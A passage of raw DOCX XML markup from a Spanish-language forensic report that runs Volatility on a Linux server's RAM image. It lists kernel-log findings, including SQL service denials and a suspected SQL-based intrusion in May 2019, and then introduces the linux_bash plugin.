          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se va</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a utilizar es </w:t>
      </w:r>
      <w:r w:rsidRPr="00D444D2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D444D2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_dmesg &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00487731">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D444D2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>/home/jrodg85/informe-linux_dmesg.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8CB050" w14:textId="77777777" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Los puntos destacables son los siguientes, algunos de estos datos se pueden encontrar con mayor detalle en el comando citado anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D8708" w14:textId="73D3D3C4" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Establecimiento del tiempo origen de tiempos donde el 28 de </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>agosto</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de 2018 a las 10:23:07 UTC el cual arranca el servidor. Se considera que el tiempo [0.0] es el origen de tiempos del sistema marcado en microsegundos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6182113A" w14:textId="4B5F7D5F" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Linux version 4.15.0-1021-aws (buildd@lcy01-amd64-001) (gcc version 7.3.0 (Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Ubuntu: Una distribución de Linux basada en Debian, popular por su facilidad de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B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7.3.0-16ubuntu3)) #21-Ubuntu SMP Tue Aug 28 10:23:07 UTC 2018 (Ubuntu 4.15.0-1021.21-aws 4.15.18)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DBB74F" w14:textId="1BBD4B28" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se descarta información relativo al arranque del servidor. Se mantiene la relevante la cual se explica a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69143859" w14:textId="4D6D54B0" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El Servidor es una Máquina virtual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C2A8B1" w14:textId="18F9589C" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hypervisor detected: Xen HVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CE5988" w14:textId="2513D724" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Memoria disponible y su distribución.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344D77F8" w14:textId="672CCF4E" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Memory: 983488K/1048180K available (12300K kernel</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Kernel: Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</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B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> code, 2391K rwdata, 3908K rodata, 2372K init, 2376K bss, 64692K reserved, 0K cma-reserved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CA9BB1" w14:textId="054DE7D7" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>EL RCT no coincide con el timestamp, puede ser una coordinación de tiempos. el 28 de agosto de 2018 a las 10:27:31 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C37EA9" w14:textId="79A84C79" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RTC time: 12:04:38, date: 12/21/18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEFD6D" w14:textId="18C3DE14" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reinicio del Servidor. 1 de septiembre de 2018 a las 09:53:22 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD1BE3" w14:textId="3449F589" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reinicio del servicio Journal 1 de septiembre de 2018 a las 09:59:10 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17138C7D" w14:textId="111DF61E" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Inicio de </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>denegación de</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción sobre el</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servicio SQL</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 de mayo de 2019 a las 20:10:29 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640153A7" w14:textId="318FB539" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Denegación </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción sobre el</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servicio SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, 7 de mayo de 2019 a las 05:53:01 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F30902" w14:textId="39E2291C" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Denegación </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción sobre el</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servicio SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10 de mayo de 2019 a las 06:39:15.104327 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AD5551" w14:textId="7E6374E0" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Denegación </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>de</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> acción sobre el</w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> servicio SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, 12 de mayo de 2019 a las 12:02:32.671468 UTC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAEB1C2" w14:textId="13EE37D2" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">13 de mayo de 2019 a las 05:27:58 UTC, posible brecha y entrada no deseada en el sistema a </w:t>
      </w:r>
      <w:r w:rsidR="009005A9" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>través</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de un ataque SQL. Se reemplaza un perfil en el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E63531" w14:textId="72209C12" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Posible ataque </w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">debido a una </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">teración del servicio SQL en el </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el 13 de mayo de 2019 a las 07:20:17 UTC por SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05939137" w14:textId="6A40D10C" w:rsidR="00AA7FAD" w:rsidRPr="00B13892" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Posible ataque </w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">debido a una </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="007C1187">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">teración del servicio SQL en el </w:t>
      </w:r>
      <w:r w:rsidR="007C1187" w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>servidor</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> el 14 de mayo de 2019 a las 21:55:10 UTC por SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09369A7D" w14:textId="783C5DF9" w:rsidR="00AA7FAD" w:rsidRDefault="00AA7FAD">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>19 de junio de 2019 a las 20:51:55.627714 UTC. Posible parcheo de la vulnerabilidad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058890BA" w14:textId="06785C2D" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00B13892">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:t>Linux_bash.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1749EA81" w14:textId="5FE11CA8" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Por ultimo y no menos importante, ya que considero que es un comando fundamenta para saber que acciones se han realizado a través de la terminal, es el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>linux_bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ya que permite ver que se ha realizado exactamente dentro del sistema, no obtendremos sus respuestas, pero se sabe que comandos se han ejecutado, y por tanto sus consecuencias. El comando </w:t>
      </w:r>
      <w:r w:rsidR="00B13892">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">que se va </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">a utilizar en este caso es </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13892">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
